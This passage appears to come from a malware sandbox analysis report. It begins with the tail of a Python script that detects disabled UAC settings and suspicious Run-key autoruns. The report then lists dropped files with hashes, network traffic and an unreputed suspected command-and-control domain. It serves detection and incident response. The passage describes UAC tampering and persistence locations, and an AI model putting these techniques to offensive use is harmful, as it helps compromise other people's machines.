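        elif len(val) >= 2 and val[0] == '"' and val[-1] == '"':
            keys[current][name] = val[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        else:
            keys[current][name] = val
    return keys


def uac_findings(reg: dict) -> list:
    """Name each UAC value that has been zeroed, with the default it replaced."""
    system = reg.get(UAC_KEY, {})
    return [f"{name}=0 (default {default})"
            for name, default in UAC_DEFAULTS.items() if system.get(name) == 0]


def uac_disabled(reg: dict) -> bool:
    """EnableLUA=0 turns UAC off entirely once the machine reboots."""
    return reg.get(UAC_KEY, {}).get("EnableLUA") == 0


def autorun_findings(reg: dict) -> list:
    """List Run-key entries whose image lives in a user-writable directory."""
    hits = []
    for key in RUN_KEYS:
        for name, value in reg.get(key, {}).items():
            if isinstance(value, str) and USER_WRITABLE.match(value):
                hits.append(f"{key}\\{name} -> {value}")
    return hits


if __name__ == "__main__":
    parsed = parse_reg(SAMPLE_REG)
    for finding in uac_findings(parsed) + autorun_findings(parsed):
        print("FINDING:", finding)
```

On a live host, export the keys with `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System uac.reg` and the three Run keys likewise, then pass the decoded text to `parse_reg`. Remember that an EnableLUA change only takes effect after a reboot, so a host whose export shows 0 may still be prompting until it is restarted.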
Executable files: 3
Suspicious files: 10
Text files: 42
Unknown types: 0

Dropped files

  • irsetup.exe (PID 6684) -> C:\ProgramData\Program\iusb3mon.exe (executable)
    MD5: E79F996B69D7FA546ED9235FDC0EE06D
    SHA256: EC7FCD3F4533D3514A9A42CBC41C40358EEA47255BAB1171146A5CCEBAF20990
  • irsetup.exe (PID 6684) -> C:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPG (image)
    MD5: 3220A6AEFB4FC719CC8849F060859169
    SHA256: 988CF422CBF400D41C48FBE491B425A827A1B70691F483679C1DF02FB9352765
  • irsetup.exe (PID 6684) -> C:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.dat (binary)
    MD5: 0C87361D5B609B0D56730DD142EDDFD9
    SHA256: D7A04FB3D8FFCDFE6E229436422BF2B1CDDFB8FC78A0345E5C324A9FF1AE5D78
  • irsetup.exe (PID 6684) -> C:\ProgramData\Program\iusb3mon.dat (compressed)
    MD5: 7DB8E66EF74C2BA301C9DE02A08AAB79
    SHA256: 9897994028E66EBA4C5691FE6AB4D9DF527580C8A48F42066E51A82BB6AE2EE9
  • irsetup.exe (PID 6684) -> C:\ProgramData\templateWatch.dat (binary)
    MD5: 02AD2CD3401BA2B6535CA8C4C59CDCA8
    SHA256: C05212A3B64061A29F774C854F53FE91F13DA53728BE15ACB14AEB56CBA715DE
  • iusb3mon.exe (PID 6796) -> C:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\_TUProjDT.dat (text)
    MD5: 67BF1F80834081FC794C6ED1F7C2FED5
    SHA256: 54FD2361602E82DB016D6EA62FBADC3984B566399DFAAC7E0A1181E4C70B90C2
  • iusb3mon.exe (PID 6796) -> C:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG1.JPG (image)
    MD5: E39405E85E09F64CCDE0F59392317DD3
    SHA256: CFD9677E1C0E10B1507F520C4ECD40F68DB78154C0D4E6563403D540F3BF829F
  • powershell.exe (PID 6820) -> C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4ljk5p5p.bum.ps1 (text)
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
  • powershell.exe (PID 6820) -> C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (binary)
    MD5: D6242D5F2FD5B3B1EB9D718A6B7C3F2F
    SHA256: CD7492D68829ECEA5C81A9FC3D2CE16EACA9C3D20C57E48FA2C77A180F716164
  • iusb3mon.exe (PID 6796) -> C:\Users\admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG2.JPG (image; identical hashes to the IRIMG1.JPG above)
    MD5: E39405E85E09F64CCDE0F59392317DD3
    SHA256: CFD9677E1C0E10B1507F520C4ECD40F68DB78154C0D4E6563403D540F3BF829F

The payload and its data file land in C:\ProgramData\Program\, the directory the Run keys point at. _ir_sf_temp_0 is the Setup Factory runtime's temporary staging folder (matching the suf_launch version information above) and _ir_tu2_temp_0 follows the same Indigo Rose naming scheme. The two powershell.exe files are routine PowerShell start-up artifacts: the __PSScriptPolicyTest_*.ps1 probe it writes to test script enforcement, and its start-up profiling cache.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 8
TCP/UDP connections: 34
DNS requests: 17
Threats: 1

HTTP requests

Columns: PID, process, method, HTTP code, IP, URL, CN, reputation. No process attribution is recorded for the first four rows.

  • GET 200 192.229.221.95:80 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D (CN unknown, whitelisted)
  • GET 200 23.48.23.156:80 http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl (CN unknown, whitelisted)
  • GET 200 184.30.21.171:80 http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl (CN unknown, whitelisted)
  • GET 200 192.229.221.95:80 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D (CN unknown, whitelisted)
  • 5236 SIHClient.exe: GET 200 184.30.21.171:80 http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl (CN unknown, whitelisted)
  • 6352 backgroundTaskHost.exe: GET 200 192.229.221.95:80 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D (CN unknown, whitelisted)
  • 5236 SIHClient.exe: GET 200 184.30.21.171:80 http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl (CN unknown, whitelisted)
  • 6352 backgroundTaskHost.exe: GET 200 192.229.221.95:80 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D (CN unknown, whitelisted)

All eight requests are certificate-revocation checks (CRL and OCSP fetches over plain HTTP, which is normal for that traffic); the four attributed rows belong to Windows components, and none is attributed to 4.exe, irsetup.exe or iusb3mon.exe.

Connections

Columns: PID, process, IP, domain, ASN, CN, reputation. No process attribution is recorded for the first five rows.

  • 192.229.221.95:80 ocsp.digicert.com (EDGECAST, US, whitelisted)
  • 192.168.100.255:137 (local broadcast, NetBIOS name service; whitelisted)
  • 51.104.136.2:443 (MICROSOFT-CORP-MSN-AS-BLOCK, IE, whitelisted)
  • 23.48.23.156:80 crl.microsoft.com (Akamai International B.V., DE, whitelisted)
  • 184.30.21.171:80 www.microsoft.com (AKAMAI-AS, DE, whitelisted)
  • 4712 MoUsoCoreWorker.exe: 51.104.136.2:443 (MICROSOFT-CORP-MSN-AS-BLOCK, IE, whitelisted)
  • 2380 svchost.exe: 51.104.136.2:443 (MICROSOFT-CORP-MSN-AS-BLOCK, IE, whitelisted)
  • 4 System: 192.168.100.255:138 (local broadcast, NetBIOS datagram service; whitelisted)
  • 1176 svchost.exe: 20.190.159.75:443 login.live.com (MICROSOFT-CORP-MSN-AS-BLOCK, IE, whitelisted)
  • 1076 svchost.exe: 23.218.210.69:443 go.microsoft.com (AKAMAI-AS, DE, whitelisted)

This excerpt shows 10 of the 34 connections, all whitelisted operating-system traffic. The CnC connection and the unusual-port connection that the signatures attribute to iusb3mon.exe (PID 6796) are not among the rows shown here and are only available in the full report.

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.110
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
login.live.com
  • 20.190.159.75
  • 40.126.31.67
  • 20.190.159.0
  • 20.190.159.4
  • 40.126.31.73
  • 20.190.159.71
  • 40.126.31.69
  • 20.190.159.73
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
k6.laomaogege.com
  • 134.122.183.243
unknown (the only resolved domain without a whitelisted reputation; every other lookup is Google, DigiCert or Microsoft infrastructure)
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report

Debug output

iusb3mon.exe: "Thread running..." (the same message logged 10 times; this is the output behind the "Sends debugging messages" signature)